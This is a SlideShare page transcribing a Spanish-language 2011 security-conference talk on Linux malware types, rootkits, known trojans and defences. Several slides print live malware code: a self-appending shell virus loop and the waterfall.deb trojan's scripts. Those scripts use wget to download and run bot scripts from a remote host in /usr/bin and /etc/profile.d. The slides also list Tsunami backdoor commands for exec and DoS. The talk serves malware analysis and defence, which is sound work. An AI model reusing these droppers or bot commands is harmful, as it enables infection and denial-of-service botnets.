Malware for Linux
Upcoming SlideShare
Loading in...5
×
 

Malware for Linux

on

  • 1,058 views

Research about Malware for Linux. This presentation was made for the Guatemalan ExploitSec Security Conference November 2011. This presentation is based on the research "Seguridad (GNU) Linux: ...

Research about Malware for Linux. This presentation was made for the Guatemalan ExploitSec Security Conference November 2011. This presentation is based on the research "Seguridad (GNU) Linux: malware, vulnerrabilidades, protección y otros recursos" that got the second price at Latin American Level for the contest "AV Security" sponsored by ESET Latinoamerica. Enjoy!

Statistics

Views

Total Views
1,058
Views on SlideShare
1,001
Embed Views
57

Actions

Likes
0
Downloads
17
Comments
0

1 Embed 57

http://adario.antigualug.org 57

Accessibility

Categories

Upload Details

Uploaded via as OpenOffice

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • Algunos de los datos que recogen son las páginas web que visita el usuario y direcciones de e_mail, a las que después se envía spam. Otros programas spyware recogen la información mediante cookies de terceros o barras de herramientas instaladas en navegadores web.
  • Las botnets son redes de computadoras infectadas, también llamadas "zombies", que pueden ser controladas a la vez por un individuo y realizan distintas tareas. Este tipo de redes son usadas para el envío masivo de spam o para lanzar ataques DDoS contra organizaciones como forma de extorsión o para impedir su correcto funcionamiento. La ventaja que ofrece a los spammers el uso de ordenadores infectados es el anonimato, que les protege de la persecución policial. En una botnet cada computadora infectada por el malware se loguea en un canal de IRC u otro sistema de chat desde donde el atacante puede dar instrucciones a todos los sistemas infectados simultáneamente. Las botnets también pueden ser usadas para actualizar el malware en los sistemas infectados manteniéndolos así resistentes ante antivirus u otras medidas de seguridad.

Malware for Linux Malware for Linux Presentation Transcript

    • Malware For Linux
      Amilcar de León
    [email_address] Esta obra está liberada bajo una licencia Creative Commons Atribución-Compartir-Igual 3.0 Guatemala
    • Malware : es un tipo de software que tiene como objetivo infiltrarse o dañar una computadora sin el consentimiento de su propietario. El término virus informático es utilizado en muchas ocasiones de forma incorrecta para referirse a todos los tipos de malware, incluyendo los verdaderos virus.
    ¿Virus ó Malware?
  • Tipos de Malware
    • Virus : tiene por objeto alterar el normal funcionamiento de la computadora, sin el permiso o el conocimiento del usuario. Los virus, habitualmente, reemplazan archivos ejecutables por otros infectados con el código de este. Tienen, básicamente, la función de propagarse a través de un software (ej: autorun.info). Necesita intervención del usuario.
  • Tipos de Malware
    • Gusanos : es un programa que se reproduce a sí mismo, explotando vulnerabilidades, en una red de computadoras para infectar otros equipos. El principal objetivo es infectar a la mayor cantidad de usuarios posible, también puede contener instrucciones dañinas al igual que los virus. No necesita intervención del usuario.
  • Tipos de Malware
    • Toryanos :
      • Finjen ser software no dañino, incluso vienen acomopañados de aplicaciones no dañinas.
      • permite la administración remota de una computadora, de forma oculta y sin el consentimiento de su propietario, por parte de un usuario no autorizado.
      • Suelen servir para instalar gusanos, spyware sin/con consentimiento del usuario (licencias).
  • Tipos de Malware
    • Spyware, AdWare :
      • recopilan información sobre las actividades realizadas por un usuario y distribuirla a agencias de publicidad u otras organizaciones interesadas.
      • Muestran publicidad no deseada.
  • Tipos de Malware
    • Backdoors:
      • Elude métodos tradicionales de autenticación
      • Provee acceso remoto a malechores
      • Pueden ser instaladas a través de otro malware (virus, gusano).
      • Acceso para permanecer ocultos y ejecutar X comandos.
  • Tipos de Malware
    • Rootkits
      • Proviene de “root” de Sistemas Unix, para obtener acceso a éste.
      • Modifican el sistema operativo para que el malware permanezca oculto al usuario, a nivel de procesos/rutinas.
      • Puede contener capacidades que impiden la eliminación del código malicioso.
      • Ejemplo 2 procesos-fantasmas: deben detectar que el otro ha sido terminado e iniciar una nueva instancia en cuestión de milisegundos. Deben matarse ambos procesos simultáneamente.
  • Tipos de Malware
    • Ataques distribuidos: BotNets
      • Redes de computadoras infectadas por malware (zombies).
      • Spam, DoS.
      • Mantienen el anonimato.
  • Primer Virus – sobre Unix
  • Estadísticas de SO - Escritorio Fuente: http://marketshare.hitslink.com Noviembre 2011
  •  
  • ¿Por qué Windows?
    • Popularidad
    • Alianzas estratégicas (monopolio?!)
    • Drivers
  • ¿Y en Servidores?
  • Estadística SO – Servidores (supercomputadoras!) Fuente: www.top500.com Noviembre 2011
  • Status Quo del Malware Fuente: viruslist.com, 2009
    • Métodos de Infección
  • Malware Linux: programación shell
      #!/bin/sh for archivo in * do tail -4 $0 >> archivo done
  • Malware Linux: archivos ELF
  • Malware Linux: archivos ELF Método Silvio Cesare
  • Malware Linux: paquetes de distribuciones (deb, rpm, otros)
    • Ejecutables, fácil instalación.
    • Necesitamos privilegios de root .
  • Malware Linux: waterfall.deb
    • Troyano
    • Año 2009
    • Gnome-look.org
  • Malware Linux: waterfall.deb Waterfall.deb ( infected ) Instalar/Ejecutar como root Sistema Infectado!
  • Malware Linux: waterfall.deb
    • Waterfall.deb descarga un segundo fichero auto.sh
    • Auto.sh se ejecuta con privilegios de root
    • Crea archivo gnome.sh en /etc/profile.d
    • gnome.sh contiene código que permite enviar grandes paquetes de datos a un servidor remoto.
    • Con ésto se permite la participación de la computadora para un ataque DoS.
  • Malware Linux: waterfall.deb
      #!/bin/sh cd /usr/bin/ rm Auto.bash sleep 1 wget http://05748.t35.com/Bots/Auto.bash chmod 777 Auto.bash echo ----------------- cd /etc/profile.d/ rm gnome.sh sleep 1 wget http://05748.t35.com/Bots/gnome.sh chmod 777 gnome.sh echo ----------------- clear exit
  • Malware Linux: waterfall.deb
      while do rm /usr/bin/run.bash cd /usr/bin/ wget http://05748.t35.com/Bots/index.php wget http://05748.t35.com/Bots/run.bash sleep 4 rm index.php chmod 755 run.bash command -p /usr/bin/run.bash done
    Auto.sh
  • Malware Linux: backdoor ELF/Tsunami
    • Infecta con Unix/Linux embebidos.
    • Deposita un ELF en el sistema infectado que obtiene contraseña root por medio de fuerza bruta, creando un usuario fantasma con privilegios de root.
    • Una vez dentro del router, se conecta a un canal IRC donde descarga versiones actualizadas de sí mismo.
    • Luego, el atacante puede ejecutar varios comandos maliciosos.
    • Verifica modelo/version de router para aprovecharse de vulnerabilidades.
  • Malware Linux: backdoor ELF/Tsunami
      . login [password]: permite acceso al bot. . logout : permite al bot desloguearse. . exec : ejecuta un comando de sistema. TSUNAMI [TARGET] [secs]: éste comando hace que bot ejecute un ataque de denegación de servicios (DoS) hacia un blanco específico enviando paquetes en intervalos de N segundos.
  • Malware Linux: rootkits
    • A nivel de Usuario :
    • Es el tipo más simple de detectar y por consiguiente de
      eliminar.
    • Típicamente reemplazan una aplicación de usuario por un programa que éstos han modificado por su propia cuenta. Éstos son fáciles – relativamente – de detectar porque porque el kernel no sufre alteraciones y por ésta razón continúa siendo confiable.
  • Malware Linux: rootkits
      2. A nivel de Sistema : éste tipo es más complejo ya que se dificulta su detección
      porque algún componente del kernel ha sufrido alteraciones y éste último deja de ser confiable.
    • Éstos rootkits tienen la capacidad de eliminar los logs del atacante intruso e incluso reemplazar las llamadas de sistema (syscalls).
  • Detección de Rootkits
    • Revisión de integridad de archivos
    • Tripwire
    • Rpm --verify
  • Fallos y/o vulnerabilidades en aplicaciones sobre SO
    • 45% de los defectos descubiertos en proyectos de código abierto son considerados defectos de alto riesto.
    • Pueden ser defectos severos que podrían resultar en brechas de seguridad.
    • De un análisis de 5.7 mi de líneas de código, se encuentra un promedio de 0.17 fallos por cada 1000 líneas de código.
    • Software propietario tiene un promedio de 20/30 por cada 1000 líneas.
    • Modelo de desarrollo Open Source detecta y resuelve bugs más rápido.
    Fuente: Coverity Scan: Open Source Integrity Report
  • Backdoor en vsftp
    • Código malicioso que contenía un troyano.
    • Se activa cuando el usuario ingresa determinados caracteres.
    • Abre un socket en el puerto 6200 y el atacante podría ingresar tecleando simplemente el caracter ingresado previamente.
    • Flash player (ajeno a vsftp).
  • Conclusiones
    • Linux es seguro, a medida que se conoce su funcionamiento y sus vulnerabilidades, para poder prevenir ó mitigar situaciones.
    • No pecar, sensación de falsa seguridad.
    • Tipo de target Linux a nivel de servidor y escritorio.
    • Debe haber seguridad, física, lógica y a nivel de usuario.
    • Iptables, SELinux, Grsecurity, Bastille Linux, AV.
    • Nunca terminamos un proyecto de seguridad.
    • Todo es relativo según la tendencia...
  •  
  •  
  • ” La Seguridad no es un producto, es un proceso”
      Bruce Schneier
    • Gracias!
    • [email_address]
    • Http://adario.antigualug.org